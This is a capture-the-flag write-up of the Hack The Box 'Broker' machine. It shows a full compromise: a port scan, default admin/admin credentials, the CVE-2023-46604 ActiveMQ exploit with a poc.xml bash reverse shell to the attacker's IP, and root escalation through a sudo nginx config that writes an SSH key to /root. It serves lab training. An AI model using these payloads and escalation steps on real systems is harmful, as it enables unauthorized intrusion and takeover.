HTB Broker done
Broker
OS:
Linux
Technology:
nginx 1.18.0
Jetty 9.4.39.v20210325
ActiveMQ 5.15.15
mqtt
amqp
IP Address:
10.10.11.243
Open ports:
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
1883/tcp open mqtt
5672/tcp open amqp?
8161/tcp open http Jetty 9.4.39.v20210325
44585/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
61614/tcp open http Jetty 9.4.39.v20210325
61616/tcp open apachemq ActiveMQ OpenWire transport
Users and pass:
Login
L: admin
P: admin
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.11.243_nmap 10.10.11.243 ; cat 10.10.11.243_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-22 14:55 CEST
Nmap scan report for 10.10.11.243
Host is up (0.059s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp open mqtt
| mqtt-subscribe:
| Topics and their most recent payloads:
|_ ActiveMQ/Advisory/Consumer/Topic/#:
5672/tcp open amqp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
8161/tcp open http Jetty 9.4.39.v20210325
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
44585/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
Open website: http://10.10.11.243/
I used a default creds (HTTP basic auth) and open website http://10.10.11.243/admin/
L: admin
P: admin
Exploit: CVE-2023-46604 - Apache ActiveMQ Remote Code Execution
https://github.com/evkl1d/CVE-2023-46604
Download explit
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ git clone https://github.com/evkl1d/CVE-2023-46604.git
Cloning into 'CVE-2023-46604'...
remote: Enumerating objects: 22, done.
remote: Counting objects: 100% (22/22), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 22 (delta 5), reused 13 (delta 3), pack-reused 0
Receiving objects: 100% (22/22), 5.10 KiB | 53.00 KiB/s, done.
Resolving deltas: 100% (5/5), done.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ cd CVE-2023-46604
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ ls
exploit.py poc.xml README.md
Edit exploit - file poc.xml
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ cat poc.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>bash -i >& /dev/tcp/10.10.10.10/9001 0>&1</value>
</list>
</constructor-arg>
</bean>
</beans>
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ vim poc.xml
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ cat poc.xml | grep 10.10.16.7
<value>bash -i >& /dev/tcp/10.10.16.7/9001 0>&1</value>
Run exploit
Run webserver - python
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.243 - - [22/Apr/2024 15:32:09] "GET /poc.xml HTTP/1.1" 200 -
10.10.11.243 - - [22/Apr/2024 15:32:09] "GET /poc.xml HTTP/1.1" 200 -
---
Run netcat
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.243] 56338
bash: cannot set terminal process group (883): Inappropriate ioctl for device
bash: no job control in this shell
activemq@broker:/opt/apache-activemq-5.15.15/bin$ id
id
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)
---
Run exploit
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Broker/CVE-2023-46604]
└─$ python exploit.py -i 10.10.11.243 -u http://10.10.16.7/poc.xml
_ _ _ __ __ ___ ____ ____ _____
/ \ ___| |_(_)_ _____| \/ |/ _ \ | _ \ / ___| ____|
/ _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | | | _|
/ ___ \ (__| |_| |\ V / __/ | | | |_| |_____| _ <| |___| |___
/_/ \_\___|\__|_| \_/ \___|_| |_|\__\_\ |_| \_\\____|_____|
[*] Target: 10.10.11.243:61616
[*] XML URL: http://10.10.16.7/poc.xml
[*] Sending packet: 0000006c1f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010019687474703a2f2f31302e31302e31362e372f706f632e786d6c
Read flag: user.txt
activemq@broker:/opt/apache-activemq-5.15.15/bin$ find / -name "user.txt" 2>/dev/null
<mq-5.15.15/bin$ find / -name "user.txt" 2>/dev/null
/home/activemq/user.txt
activemq@broker:/opt/apache-activemq-5.15.15/bin$ cat /home/activemq/user.txt
cat /home/activemq/user.txt
ad5fb3401c1edd660a110e7f32fdfca2
activemq@broker:/opt/apache-activemq-5.15.15/bin$
Privilege Escalation
Check sudo -l
User can use nginx as root with no password
___
activemq@broker:~$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
activemq@broker:~$
Upload ssh key to /root/.ssh/
Prepare config file for nginx
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ cat write_file.conf
user root;
events {
worker_connections 1024;
}
http {
server {
listen 3000;
root /;
autoindex on;
dav_methods PUT;
}
}
___
Upload config file
activemq@broker:/tmp$ wget 10.10.16.7/write_file.conf
wget 10.10.16.7/write_file.conf
--2024-04-22 14:01:18-- http://10.10.16.7/write_file.conf
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 163 [application/octet-stream]
Saving to: ‘write_file.conf’
0K 100% 146K=0.001s
2024-04-22 14:01:18 (146 KB/s) - ‘write_file.conf’ saved [163/163]
activemq@broker:/tmp$ ls
ls
write_file.conf
___
Run webserver - python
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.243 - - [22/Apr/2024 16:01:17] "GET /write_file.conf HTTP/1.1" 200 -
Run fake nginx server
activemq@broker:/tmp$ sudo /usr/sbin/nginx -c /tmp/write_file.conf
sudo /usr/sbin/nginx -c /tmp/write_file.conf
activemq@broker:/tmp$ ss -tulpn
ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:3000 0.0.0.0:*
tcp LISTEN 0 4096 *:61613 *:* users:(("java",pid=944,fd=145))
tcp LISTEN 0 50 *:61614 *:* users:(("java",pid=944,fd=148))
tcp LISTEN 0 4096 *:61616 *:* users:(("java",pid=944,fd=143))
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 4096 *:1883 *:* users:(("java",pid=944,fd=146))
tcp LISTEN 0 50 *:8161 *:* users:(("java",pid=944,fd=154))
tcp LISTEN 0 4096 *:5672 *:* users:(("java",pid=944,fd=144))
tcp LISTEN 0 50 *:44585 *:* users:(("java",pid=944,fd=26))
activemq@broker:/tmp$
SSH key generate
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): ./id_rsa_broker
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa_broker
Your public key has been saved in ./id_rsa_broker.pub
The key fingerprint is:
SHA256:QBzdOR9DqOm3GhxnhuocthxOZ+kTwziizBY43PRHUew kali@pentest
The key's randomart image is:
+--[ED25519 256]--+
| .oooo +. |
| .....= o |
| . oo o o |
| . ooE . |
|..o . .+S + |
|o.....o+=*. |
| + o .B.*+ . |
| = B B... |
| . * oo |
+----[SHA256]-----+
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ cat id_rsa_broker.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPeRu1TefscB0E79TibwT4gFnwQQt49yuz8kk39ygX30 kali@pentest
Write ssh key to /root/.ssh/
activemq@broker:/tmp$ curl -X PUT localhost:3000/root/.ssh/authorized_keys -d 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPeRu1TefscB0E79TibwT4gFnwQQt49yuz8kk39ygX30 kali@pentest'
<efscB0E79TibwT4gFnwQQt49yuz8kk39ygX30 kali@pentest'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 93 0 0 100 93 0 42119 --:--:-- --:--:-- --:--:-- 93000
activemq@broker:/tmp$
SSH connection as user root
──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Broker]
└─$ ssh [email protected] -i /tmp/id_rsa_broker
The authenticity of host '10.10.11.243 (10.10.11.243)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.243' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Apr 22 02:06:04 PM UTC 2024
System load: 0.0
Usage of /: 71.4% of 4.63GB
Memory usage: 14%
Swap usage: 0%
Processes: 160
Users logged in: 0
IPv4 address for eth0: 10.10.11.243
IPv6 address for eth0: dead:beef::250:56ff:feb9:d2cd
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
root@broker:~# id
uid=0(root) gid=0(root) groups=0(root)
Read flag: root.txt
root@broker:~# cd /root
root@broker:~# ls -a
. .. .bash_history .bashrc .cache cleanup.sh .local .profile root.txt .ssh
root@broker:~# cat root.txt
96b83fd55987625eec9152c68ad1b0f5
root@broker:~#
References
[CVE-2023-46604 - Apache ActiveMQ Remote Code Execution](https://github.com/evkl1d/CVE-2023-46604)
Lessons Learned